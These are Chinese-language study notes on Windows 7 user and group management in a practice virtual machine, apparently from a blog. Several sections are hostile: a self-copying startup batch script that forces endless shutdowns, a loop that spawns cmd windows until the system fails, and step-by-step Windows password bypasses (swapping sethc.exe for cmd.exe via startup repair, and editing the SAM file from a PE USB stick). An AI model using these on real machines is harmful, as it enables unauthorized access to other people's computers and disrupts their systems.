新建文件夹,给win7建立一个虚拟家目录
下载好win7镜像,msdn提供下载
新建虚拟机,并将内存改为512m或1G,插入下载好的镜像
开机,安装系统
安装vm tools,重启
关闭防火墙
关闭自动更新
调出桌面图标
关机,做快照
用户对应着当前使用电脑的身份,不同的身份有着不同的权限。
windows服务器系统:win2000 win2003 win2008 win2012
其中win2000市面上基本上没有用的啦,win2012和win2008功能差不多,只是桌面不一样
linux服务器系统:Redhat Centos
每一个用户登录系统后,拥有不同的操作权限
每一个用户有自己唯一的SID(安全标识符)
用户SID: S-1-5-21-426206823-2579496042-14852678-500
系统SID: S-1-5-21-426206823-2579496042-14852671
windows系统管理员administrator的UID是500
普通用户的UID是1000开始
不同的账户拥有不同的权限,为不同的账户赋权限,也就是为不用账户的SID赋权限
查看用户: whoami
查看SID值: whoami /user
账户密码存储位置: c:\windows\system32\config\SAM #暴力破解/撞库
windows系统上,默认密码最长有效期42天
给人使用的账户:
计算机服务组件相关的系统账号
注意: 内置账号是不能删除的
每个用户都有自己的配置文件(家目录),在用户第一次登录时自动产生,路径是:
win7/win2008 c:\用户
xp/win2003 c:\Documents and Settings\
net user # 查看用户列表
net user 用户名 密码 # 改密码
net user 用户名 密码 /add # 创建一个新用户
net user 用户名 /de1 # 删除一个用户
net user 用户名 /active:yes/no # 激活或禁用账户
练习;
1、练习图形及命令行中,进行用户管理(包括创建、修改密码、删除用户、登录并验证家目录产生、及权限)
2、制作一个批处理脚本,可以实现互动创建用户!
无限关机病毒最终版
@echo off
copy mm.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup"
# 启动项路径最终版
# win7/win10都是这个路径,userprofile --> 当前用户配置文件的路径
shutdown -s -f -t 0
组的作用: 简化权限的赋予。
赋权限方式:
内置组的权限默认已经被系统赋予。
1) administrators #管理员组
2) guests #来宾组
3) users #普通用户组,默认新建用户都属于该组
4) network #网络配置组
5) print #打印机组
6) Remote Desktop #远程桌面组
net localgroup #查看组列表
net 1ocalgroup 组名 #查看该组的成员
net 1ocalgroup 组名 /add #创建一个新的组
net 1ocalgroup 组名 用户名 /add #添加用户到组
net 1ocalgroup 组名 用户名 /del #从组中踢出用户
net 1ocalgroup 组名 /del #删除组
练习:
1、练习图形及命令行中,进行组管理(创建组、组成员添加、查看组成员、成员脱离组、删除组)
2、创建1个普通用户1isi,并将1isi提升为管理员,并验证lisi是否成功取得管理员权限!
1、在未登录系统时,连续按5次shift键, 弹出程序C:\windows\system32\sethc.exe
2、部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件名!
注:如win7或win10系统已修补漏洞2,则无法利用
C: windows\system32\cmd
2、用户/账户密码存储位置
c:\windows\system32\config\SAM
#非逆转型加密、使用hash值类似的方法、MD5 SHA
net user 用户名 新密码
案例:破解win7系统密码
实验步骤:
1、开启win7虚拟机,开机,并设置一个复杂密码:
2、关机,并开机,在出现windows启动界面时强制关机;
3、再开机,出现“启动修复(推荐)”及选择该项: #如为出现,多尝试儿次第2步,如还不行,请换其他方法
4、出现系统还原提示,点击取消,等待几分钟后,会出现问题原因,点击查看详细信息:
5、打开最后一个链接即一个记事本:
6、记事本中点打开,并选择显示所有文件:
7、找到sethc并改名sethc-bak,再找到cmd, 复制一份cmd改名为sethc
8、全部关闭,重启。
9、系统启动完毕后,连续按5次shift键,将弹出cmd工具,使用命令net user 用户名 新密码,将当前用户密码修改掉即可,或者另外建立1个用户,并提升为管理员,注销后,可再删除新建的用户,这样的好处为不修改当前用户的密码即可登录系统。
: 用来划分区块
goto 用来跳转
如果你有编程基础, 你可以理解成是定义函数, 以及调用函数
编写一个有菜单选择的批处理文件:
@echo off
color 0a
title mn小程序
:menu
cls
echo ==================================
echo 1.定时关机
echo 2.蓝屏炸弹
echo 3.创建用户
echo 4.退出程序
echo ==================================
set /p num=请输入你的选择:
if "%num%"=="1" goto a
if "%num%"=="2" goto b
if "%num%"=="3" goto c
if "%num%"=="4" goto d
echo 他妈的,不看序号的吗?傻逼,乱输入,看清楚点.
pause
goto menu
:a
set /p time=请输入关机倒计时(单位:秒,时间不能大于1000):
shutdown -s -f -t %time%
goto menu
:b
echo 我是蓝屏炸弹
goto menu
:c
set /p user=请输入用户名:
set /p pwd=请输入密码:
net user %user% %pwd% /add
echo 用户%user%已经创建成功!
pause
goto menu
:d
exit
# 无限打开cmd,暴力破坏电脑
:a
start cmd
goto a
假装忘记密码!
第一步: 准备一个空U盘(记着备份u盘中的数据)
第二步: 准备一个PE系统制作工具(新与18可以破解的系统版本不一样)链接
第三步: 插入U盘,并运行pe软件,然后点击一键安装! 此时u盘就变成了pe启动盘
第四步: 将U盘插入要破解密码的电脑设备上!
第五步:开机,马上立即赶紧狂按E2或者F1或者esc,进入bios ( 虚拟机直接进入固件 ), 去修改启动顺序!
第六步:开机,进入PE系统,此时你也可以看见一个桌面,桌面上一般有一个篡改SAM文件的工具,运行这个工具,并打开sam文件,直接修改密码!
第七步:拔掉U盘 ( 虚拟机是把两个连接取消 ), 重启电脑
原文:https://www.cnblogs.com/xcymn/p/14464683.html